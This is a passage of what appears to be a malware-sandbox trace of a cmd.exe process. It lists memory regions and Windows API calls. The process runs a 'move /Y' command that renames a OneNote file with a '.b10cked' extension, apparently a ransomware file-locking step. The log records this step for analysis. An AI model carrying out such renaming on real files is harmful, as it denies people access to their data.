\"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29296 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29297 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29298 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29299 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 29300 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29301 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29302 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29303 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29304 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29305 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29758 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29759 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29760 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29761 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 29762 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 29763 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29764 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29765 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29766 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29767 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29768 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29769 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29770 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29771 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29772 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 29773 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29774 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29775 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29776 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29777 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29778 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 29779 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 29780 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 29781 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 29978 start_va = 0x1320000 end_va = 0x13dffff entry_point = 0x1320000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 668 os_tid = 0x70c [0202.215] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afb04 | out: lpSystemTimeAsFileTime=0x1afb04*(dwLowDateTime=0xad55ff60, dwHighDateTime=0x1d440a9)) [0202.215] GetCurrentProcessId () returned 0xd2c [0202.215] GetCurrentThreadId () returned 0x70c [0202.215] GetTickCount () returned 0x39137 [0202.215] QueryPerformanceCounter (in: lpPerformanceCount=0x1afafc | out: lpPerformanceCount=0x1afafc*=25900415854) returned 1 [0202.215] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.215] __set_app_type (_Type=0x1) [0202.215] __p__fmode () returned 0x76b331f4 [0202.216] __p__commode () returned 0x76b331fc [0202.216] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.216] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.216] GetCurrentThreadId () returned 0x70c [0202.216] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x70c) returned 0x38 [0202.216] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.216] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.216] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.218] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa94 | out: phkResult=0x1afa94*=0x0) returned 0x2 [0202.218] VirtualQuery (in: lpAddress=0x1afacb, lpBuffer=0x1afa64, dwLength=0x1c | out: lpBuffer=0x1afa64*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.218] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afa64, dwLength=0x1c | out: lpBuffer=0x1afa64*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.218] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afa64, dwLength=0x1c | out: lpBuffer=0x1afa64*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.218] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afa64, dwLength=0x1c | out: lpBuffer=0x1afa64*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.218] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afa64, dwLength=0x1c | out: lpBuffer=0x1afa64*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.218] GetConsoleOutputCP () returned 0x1b5 [0202.219] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.219] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.219] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.219] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.219] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.219] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.219] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.219] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.219] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.220] GetEnvironmentStringsW () returned 0x3b0180* [0202.220] FreeEnvironmentStringsW (penv=0x3b0180) returned 1 [0202.220] GetEnvironmentStringsW () returned 0x3b0180* [0202.220] FreeEnvironmentStringsW (penv=0x3b0180) returned 1 [0202.220] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aea04 | out: phkResult=0x1aea04*=0x40) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x0, lpData=0x1aea10*=0xa8, lpcbData=0x1aea08*=0x1000) returned 0x2 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x1, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x0, lpData=0x1aea10*=0x1, lpcbData=0x1aea08*=0x1000) returned 0x2 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x0, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x40, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x40, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x0, lpData=0x1aea10*=0x40, lpcbData=0x1aea08*=0x1000) returned 0x2 [0202.220] RegCloseKey (hKey=0x40) returned 0x0 [0202.220] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1aea04 | out: phkResult=0x1aea04*=0x40) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x0, lpData=0x1aea10*=0x40, lpcbData=0x1aea08*=0x1000) returned 0x2 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x1, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x0, lpData=0x1aea10*=0x1, lpcbData=0x1aea08*=0x1000) returned 0x2 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x0, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x9, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x4, lpData=0x1aea10*=0x9, lpcbData=0x1aea08*=0x4) returned 0x0 [0202.220] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1aea0c, lpData=0x1aea10, lpcbData=0x1aea08*=0x1000 | out: lpType=0x1aea0c*=0x0, lpData=0x1aea10*=0x9, lpcbData=0x1aea08*=0x1000) returned 0x2 [0202.221] RegCloseKey (hKey=0x40) returned 0x0 [0202.221] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a4 [0202.221] srand (_Seed=0x5b8863a4) [0202.221] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked\"" [0202.221] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked\"" [0202.221] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.221] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b18e0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0202.221] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0202.221] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0202.221] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.221] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0202.221] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0202.221] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0202.221] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0202.221] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0202.221] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0202.221] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0202.221] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0202.221] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0202.222] GetEnvironmentStringsW () returned 0x3b22d0* [0202.222] FreeEnvironmentStringsW (penv=0x3b22d0) returned 1 [0202.222] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.222] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0202.222] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0202.222] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0202.222] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0202.222] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0202.222] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0202.222] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0202.222] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0202.222] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0202.222] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af7d0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.222] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af7d0, lpFilePart=0x1af7cc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af7cc*="Desktop") returned 0x18 [0202.222] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.222] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af54c | out: lpFindFileData=0x1af54c) returned 0x3b0010 [0202.222] FindClose (in: hFindFile=0x3b0010 | out: hFindFile=0x3b0010) returned 1 [0202.222] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af54c | out: lpFindFileData=0x1af54c) returned 0x3b0010 [0202.222] FindClose (in: hFindFile=0x3b0010 | out: hFindFile=0x3b0010) returned 1 [0202.223] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af54c | out: lpFindFileData=0x1af54c) returned 0x3b0010 [0202.223] FindClose (in: hFindFile=0x3b0010 | out: hFindFile=0x3b0010) returned 1 [0202.223] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0202.223] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0202.223] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0202.223] GetEnvironmentStringsW () returned 0x3b2af0* [0202.223] FreeEnvironmentStringsW (penv=0x3b2af0) returned 1 [0202.223] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0202.223] GetConsoleOutputCP () returned 0x1b5 [0202.223] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.224] GetUserDefaultLCID () returned 0x409 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af910, cchData=128 | out: lpLCData="0") returned 2 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af910, cchData=128 | out: lpLCData="0") returned 2 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af910, cchData=128 | out: lpLCData="1") returned 2 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0202.224] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0202.224] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0202.225] GetConsoleTitleW (in: lpConsoleTitle=0x3a08e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.225] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.225] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0202.225] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0202.225] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0202.226] _wcsicmp (_String1="move", _String2=")") returned 68 [0202.226] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0202.226] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0202.226] _wcsicmp (_String1="IF", _String2="move") returned -4 [0202.226] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0202.226] _wcsicmp (_String1="REM", _String2="move") returned 5 [0202.226] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0202.229] GetConsoleTitleW (in: lpConsoleTitle=0x1af608, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.229] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0202.229] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0202.229] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0202.229] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0202.229] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0202.229] _wcsicmp (_String1="move", _String2="CD") returned 10 [0202.229] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0202.229] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0202.229] _wcsicmp (_String1="move", _String2="REN") returned -5 [0202.229] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0202.229] _wcsicmp (_String1="move", _String2="SET") returned -6 [0202.229] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0202.229] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0202.229] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0202.229] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0202.229] _wcsicmp (_String1="move", _String2="MD") returned 11 [0202.229] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0202.229] _wcsicmp (_String1="move", _String2="RD") returned -5 [0202.229] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0202.229] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0202.229] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0202.229] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0202.229] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0202.229] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0202.229] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0202.229] _wcsicmp (_String1="move", _String2="VER") returned -9 [0202.229] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0202.229] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0202.230] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0202.230] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0202.230] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0202.230] _wcsicmp (_String1="move", _String2="START") returned -6 [0202.230] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0202.230] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0202.230] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0202.231] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.231] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.231] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1af3c4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x1af3bc, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x1af3bc*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0202.232] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 